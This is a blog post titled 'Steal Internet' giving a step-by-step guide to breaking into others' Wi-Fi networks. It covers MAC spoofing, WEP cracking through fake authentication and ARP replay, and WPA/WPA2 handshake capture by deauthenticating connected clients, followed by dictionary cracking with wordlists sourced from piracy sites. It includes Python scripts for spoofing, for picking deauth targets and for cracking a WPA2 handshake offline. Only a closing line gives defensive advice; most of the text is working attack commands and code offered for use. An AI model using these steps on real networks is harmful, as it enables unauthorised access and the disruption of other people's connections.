
Saturday 3 June 2017

Steal Internet


By Micky Verma

How to steal internet


Step 1 Spoofing a MAC Address

Before any competent attacker touches your AP, they will spoof their MAC (Media Access Control) address. The MAC address is the burned-in identifier of your wireless NIC (Network Interface Card): the first three octets name the card's manufacturer, and the AP records the full address of every client that associates. An unspoofed address ties an attack to one specific piece of hardware.
To spoof a MAC address, open a terminal and run:
    sudo ifconfig wlan0 down
    sudo ifconfig wlan0 hw ether 46:75:63:6b:55:21
    sudo ifconfig wlan0 up
Anyone doing this regularly scripts it. You can use almost any hex address here (mine is just an example), but keep the lowest bit of the first octet clear (unicast) and the next bit set (locally administered), as 46 does: Linux refuses to set a multicast address, and a locally administered one cannot collide with any vendor's range.
To make sure your MAC changed, run:
    ifconfig wlan0
and confirm that the hardware address shown for "wlan0" is the one you set. On systems without net-tools, "ip link set dev wlan0 address 46:75:63:6b:55:21" and "ip link show wlan0" do the same job.
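The scripted version of Step 1 that an attacker would keep around, as an added example in Python (not the article's code): it generates a random locally administered unicast MAC, applies it with the same three ifconfig commands the article uses, and reads the interface back to verify the change. The `is_usable_mac` check, the `dry_run` flag and the `--dry-run` argument are this example's own; the default interface name wlan0 is an assumption.

```python
#!/usr/bin/env python3
"""Spoof a wireless NIC's MAC with ifconfig, as in Step 1 of the article.
Added example; the ifconfig sequence is the article's, the rest is ours."""
import os
import re
import subprocess
import sys

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.IGNORECASE)


def random_mac() -> str:
    """Six random bytes, with the first octet fixed so the address is
    unicast (bit 0 clear) and locally administered (bit 1 set). That keeps
    it out of every vendor's OUI range, and Linux rejects multicast
    addresses anyway."""
    b = bytearray(os.urandom(6))
    b[0] = (b[0] & 0xFC) | 0x02
    return ":".join(f"{x:02x}" for x in b)


def is_usable_mac(mac: str) -> bool:
    """True if `mac` is well formed, unicast and locally administered."""
    if not MAC_RE.match(mac):
        return False
    first = int(mac.split(":")[0], 16)
    return first & 0x03 == 0x02


def spoof_mac(iface: str, mac: str, dry_run: bool = False) -> list:
    """Apply `mac` to `iface` with the article's ifconfig sequence and
    verify it took. Returns the command lines, so a dry run can be
    inspected without root or a wireless card."""
    if not is_usable_mac(mac):
        raise ValueError(f"refusing {mac!r}: not a unicast, locally administered MAC")
    cmds = [
        ["sudo", "ifconfig", iface, "down"],
        ["sudo", "ifconfig", iface, "hw", "ether", mac],
        ["sudo", "ifconfig", iface, "up"],
    ]
    if not dry_run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)
        # New net-tools prints "ether 46:75:..", old ones "HWaddr 46:75:.."
        # in upper case, so compare case-insensitively.
        out = subprocess.run(["ifconfig", iface], capture_output=True,
                             text=True, check=True).stdout
        if mac.lower() not in out.lower():
            raise RuntimeError(f"{iface} still does not show {mac}")
    return [" ".join(c) for c in cmds]


if __name__ == "__main__":
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    iface = args[0] if args else "wlan0"          # assumed interface name
    new_mac = random_mac()
    for line in spoof_mac(iface, new_mac, dry_run="--dry-run" in sys.argv):
        print(line)
    print(f"{iface} -> {new_mac}")
```

Run it as `python3 spoof.py wlan0` (needs sudo rights) or with `--dry-run` to only print the commands. Because airmon-ng may create a fresh monitor interface in Step 4, run it again against that interface if its address is not the spoofed one.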

Step 2 Finding Your AP

To find your AP, scan the wireless networks in range:
    sudo iwlist wlan0 scan
Each "Cell" in the output lists the AP's MAC address ("Address:"), its channel ("Channel:"), its name ("ESSID:") and the security in use: "Encryption key:off" is an open network, "IE: WPA Version 1" or "IE: IEEE 802.11i/WPA2" is WPA/WPA2, and "Encryption key:on" with neither IE is WEP. Write down the MAC address, the channel and the ESSID; you will need them later.

Step 3 Install Aircrack-NG

Install the aircrack-ng suite. It contains all the tools used below (airmon-ng, airodump-ng, aireplay-ng and aircrack-ng itself). In Arch Linux, it is:
    sudo pacman -S aircrack-ng
And Ubuntu:
    sudo apt-get install aircrack-ng
Current packages ship the airmon-ng shell script together with the suite. If "which airmon-ng" finds nothing after the install, your distribution splits the scripts into a separate package; on Arch that is:
    sudo pacman -S aircrack-ng-scripts
And Ubuntu:
    sudo apt-get install aircrack-ng-scripts

Step 4 Cracking the Wireless AP

Now we start the actual attack on the AP. Replace the text in brackets with the values you wrote down in Step 2.
Put your wireless interface into monitor mode, so that it captures every frame on the channel rather than only those addressed to it. First stop the processes that would otherwise keep resetting the card (NetworkManager, wpa_supplicant), then start monitor mode:
    sudo airmon-ng check kill
    sudo airmon-ng start wlan0
-OR-, by hand with the wireless-tools:
    sudo ifconfig wlan0 down
    sudo iwconfig wlan0 mode monitor
    sudo ifconfig wlan0 up
airmon-ng prints the name of the monitor interface it created. Older versions add a second interface named "mon0", which is the name used in the commands below; newer versions rename the card itself to "wlan0mon", and the manual method keeps the name "wlan0". Substitute whatever name you have wherever "mon0" appears, and check with "ifconfig" that the monitor interface carries the MAC you set in Step 1 (repeat Step 1 on it if not).
If you have a WEP encrypted network, refer to "Cracking WEP" below. If you have a WPA or WPA2 network, skip it and go straight to "Cracking WPA & WPA2".

Cracking WEP

WEP leaks its key through the 24-bit IV that is sent in the clear with every frame, so the attack amounts to collecting enough frames with distinct IVs. To make the AP generate them, you associate with it (a "fake authentication", which WEP allows without knowing the key) and then replay captured ARP requests, which the AP re-broadcasts with fresh IVs. Note: if the fake authentication fails (for example because the AP filters MACs), spoof your MAC to match one of the clients already connected; they are listed under "STATION" in airodump-ng.
First start the live capture of IVs, in one terminal tab:
    sudo airodump-ng --ivs -c [channel of AP] --bssid [AP's MAC address] -w ~/Desktop/wep mon0
The "-w" argument is a file prefix, not a directory; with "--ivs" this writes ~/Desktop/wep-01.ivs.
Next, in another tab, fake-authenticate with the AP ("-1 0" selects fake authentication with no re-association delay):
    sudo aireplay-ng -1 0 -a [AP's MAC] -e [AP's ESSID(name)] -h [Your MAC] mon0
When aireplay-ng reports "Association successful :-)", start the ARP request replay attack:
    sudo aireplay-ng -3 -b [AP's MAC] -h [Your MAC] mon0
Once it catches an ARP request you will see the "#Data" column in the airodump-ng window climbing quickly. Somewhere between 20,000 and 100,000 captured IVs is usually enough for aircrack-ng's PTW attack (a 40-bit key needs far fewer than a 104-bit one).
To crack the key, run aircrack-ng on the IV file (this works while airodump-ng is still capturing):
    sudo aircrack-ng ~/Desktop/wep-01.ivs
When aircrack-ng prints "KEY FOUND!", copy the key and remove the colons from it; the remaining hex digits are the WEP key. Congratulations! You just proved how easy it is for someone to crack your network. With a scripted attack, an attacker can crack a WEP network in less than 60 seconds. I've done it numerous times.

Cracking WPA & WPA2

WPA and WPA2-PSK have no IV weakness to exploit; what you capture instead is the four-way handshake, in which the client proves it knows the pre-shared key by computing a MIC over an EAPOL message with a key derived from the passphrase, the SSID, both MAC addresses and both sides' nonces. Everything in that computation except the passphrase travels in the clear, so a captured handshake can be attacked offline by guessing passphrases.
To capture the handshake, start airodump-ng with this command (again "-w" takes a prefix; this writes ~/Desktop/psk-01.cap):
    sudo airodump-ng -c [channel of AP] --bssid [AP's MAC] -w ~/Desktop/psk mon0
Now we de-authenticate a client to force it to reconnect and perform a fresh handshake, instead of waiting for one. Switch to the airodump-ng window and look at the associated clients (listed under "STATION" at the bottom). Copy the MAC address. If there aren't any, wait until someone connects, or come back later when you can have another computer connected. Here is the terminal command to force de-authentication (15 deauth bursts; omit "-c" to de-authenticate every client of the AP):
    sudo aireplay-ng -0 15 -a [AP MAC] -c [Deauth client MAC] mon0
In the airodump-ng status line, the top-right corner should now read "WPA handshake:" followed by the AP's MAC address.
The handshake was captured and you can now stop the capture. If you didn't get the handshake, you might not be close enough to the client for it to receive your deauth frames, or to the AP to capture both halves of the exchange.
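Choosing the deauth target does not have to be done by eye: airodump-ng also writes what it shows on screen to prefix-01.csv. The following is an added Python example, not part of the article, that parses that layout (an AP table, a blank line, a station table) and lists the clients of one BSSID strongest signal first, together with the aireplay-ng line the article uses. The CSV text in the block is constructed in airodump-ng's layout for the example, not a real capture, and the MACs and names in it are made up.

```python
#!/usr/bin/env python3
"""Pick a deauth target from airodump-ng's CSV output. Added example."""
import csv
import io

# Constructed sample in the layout of airodump-ng's prefix-01.csv
# (AP section, blank line, station section). Not a real capture.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:14:6C:7E:40:80, 2017-06-03 09:00:01, 2017-06-03 09:04:50,  9,  54, WPA2, CCMP, PSK, -41,      432,       12,   0.  0.  0.  0,   8, HomeWifi,
00:1A:2B:3C:4D:5E, 2017-06-03 09:00:03, 2017-06-03 09:04:50,  6,  54, WEP, WEP, , -67,      118,     3120,   0.  0.  0.  0,   6, Shop24,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:0F:B5:FD:FB:C2, 2017-06-03 09:01:10, 2017-06-03 09:04:49, -45,      207, 00:14:6C:7E:40:80,
F0:27:65:11:22:33, 2017-06-03 09:02:30, 2017-06-03 09:04:40, -58,       61, 00:14:6C:7E:40:80, HomeWifi
D8:9E:F3:AA:BB:CC, 2017-06-03 09:03:00, 2017-06-03 09:03:05, -80,        4, (not associated), CoffeeShop,Shop24
"""


def parse_airodump_csv(text: str):
    """Return (aps, stations): two lists of dicts keyed by the header names.
    The section is recognised by its header row, which lets the parser
    survive the blank line and any ordering airodump-ng uses."""
    aps, stations = [], []
    section, header = None, []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue                        # blank separator line
        if cells[0] == "BSSID":
            section, header = aps, cells
            continue
        if cells[0] == "Station MAC":
            section, header = stations, cells
            continue
        if section is None:
            continue
        rec = dict(zip(header, cells))
        # The last column (Probed ESSIDs / Key) is not quoted, so commas in
        # it spill into extra cells; glue those back onto the last field.
        if len(cells) > len(header):
            rec[header[-1]] = ",".join(cells[len(header) - 1:])
        section.append(rec)
    return aps, stations


def find_ap(aps, essid: str):
    """(BSSID, channel, privacy) for the AP named `essid`, or None."""
    for ap in aps:
        if ap["ESSID"] == essid:
            return ap["BSSID"], int(ap["channel"]), ap["Privacy"]
    return None


def clients_of(stations, bssid: str) -> list:
    """Station MACs associated to `bssid`, strongest signal first. The
    strongest client is the one most likely to hear our deauth frames."""
    assoc = [s for s in stations if s["BSSID"].lower() == bssid.lower()]
    assoc.sort(key=lambda s: int(s["Power"]), reverse=True)
    return [s["Station MAC"] for s in assoc]


def deauth_cmd(bssid: str, client: str, iface: str = "mon0", count: int = 15) -> str:
    """The article's aireplay-ng deauth line for one client."""
    return f"sudo aireplay-ng -0 {count} -a {bssid} -c {client} {iface}"


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    bssid, channel, privacy = find_ap(aps, "HomeWifi")
    print(f"HomeWifi is {bssid} on channel {channel} ({privacy})")
    for mac in clients_of(stations, bssid):
        print(deauth_cmd(bssid, mac))
```

Point it at your own file with `parse_airodump_csv(open("psk-01.csv").read())`; stations that have not associated show "(not associated)" in the BSSID column and are skipped by `clients_of`.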
To crack the handshake:
    sudo aircrack-ng -w [~/path/to/dictionary/file.lst] ~/Desktop/psk-01.cap
You can find great dictionaries for cracking on ThePirateBay or Packet Storm. I have over 20, depending on my situation. You can also use "coWPAtty" with tables pre-computed by its "genpmk" tool. These are often called Rainbow Tables, but they are plain lookup tables of pre-computed PMKs with their corresponding passphrases, and because the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), a table only works against the SSIDs it was built for. Against the common default SSIDs it is very effective. The Church of Wi-Fi has the best table set I've seen. However, the torrents are impossible to find now (due to lack of seeders). In order to get them, you need to buy the DVD set.
That's all there is to it. So, the bottom line is to use WPA2 with AES (CCMP) encryption in conjunction with an impossibly long random passphrase, like "71zJJmfbK50VgdmtjRVJuxcDJr5PVJJAAtG1mIBwbEUshkkO", and a non-default SSID so that no pre-computed table applies. The 4096 PBKDF2 iterations make every guess expensive for the attacker, but that only helps if the passphrase is in no wordlist.
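What aircrack-ng and genpmk actually compute, as an added Python example (not from the article or from the aircrack-ng suite): derive the PMK from passphrase and SSID with PBKDF2, expand it to the PTK with the 802.11i PRF, and compare the HMAC-SHA1 MIC of handshake message 2 for each wordlist candidate. The SSID, MAC addresses, nonces and "captured" message 2 are constructed inside the block from a known passphrase so it runs offline; the PMK check for passphrase "password" and SSID "IEEE" uses the test vector from the 802.11 standard.

```python
#!/usr/bin/env python3
"""Offline WPA2-PSK dictionary attack on a captured four-way handshake.
Added example; handshake data below is constructed, not captured."""
import hashlib
import hmac
import struct

MIC_OFF = 81   # offset of the 16-byte MIC inside an EAPOL-Key frame


def pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt: a precomputed PMK table is tied to one SSID, and
    each guess costs 2 x 4096 HMAC-SHA1 calls (two 20-byte PBKDF2 blocks)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk(pmk_: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (384 bits for CCMP); its first 16 bytes are the KCK used for the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk_, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2) MIC: HMAC-SHA1 over the EAPOL frame
    with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFF] + b"\x00" * 16 + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Return the first candidate whose derived KCK reproduces msg2's MIC."""
    want = msg2[MIC_OFF:MIC_OFF + 16]
    for word in wordlist:
        kck = ptk(pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), want):
            return word
    return None


# --- constructed handshake (made-up SSID, MACs and nonces) -----------------
SSID = "HomeWifi"
AP_MAC = bytes.fromhex("00146c7e4080")
STA_MAC = bytes.fromhex("000fb5fdfbc2")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (no key data) carrying `mic`."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set, pairwise, version 2 (HMAC-SHA1)
            + b"\x00\x10"                # key length 16
            + b"\x00" * 8                # replay counter
            + snonce + b"\x00" * 16      # key nonce, key IV
            + b"\x00" * 8 + b"\x00" * 8  # RSC, key ID
            + mic + b"\x00\x00")         # MIC, key data length 0
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


def make_capture(passphrase: str) -> bytes:
    """What the real client would send: message 2 with a valid MIC."""
    kck = ptk(pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(SNONCE, eapol_mic(kck, build_msg2(SNONCE)))


CAPTURED_MSG2 = make_capture("sunshine1")   # the "captured" frame

if __name__ == "__main__":
    words = ["letmein", "HomeWifi", "sunshine1", "password"]
    print("key found:", crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_MSG2, words))
```

The two things the article's advice rests on are visible here: `pmk` is salted with the SSID, so a genpmk table built for "linksys" is useless against a renamed network, and a 48-character random passphrase from a 62-symbol alphabet is about 285 bits of entropy, far beyond what the per-guess cost of `pmk` lets anyone enumerate.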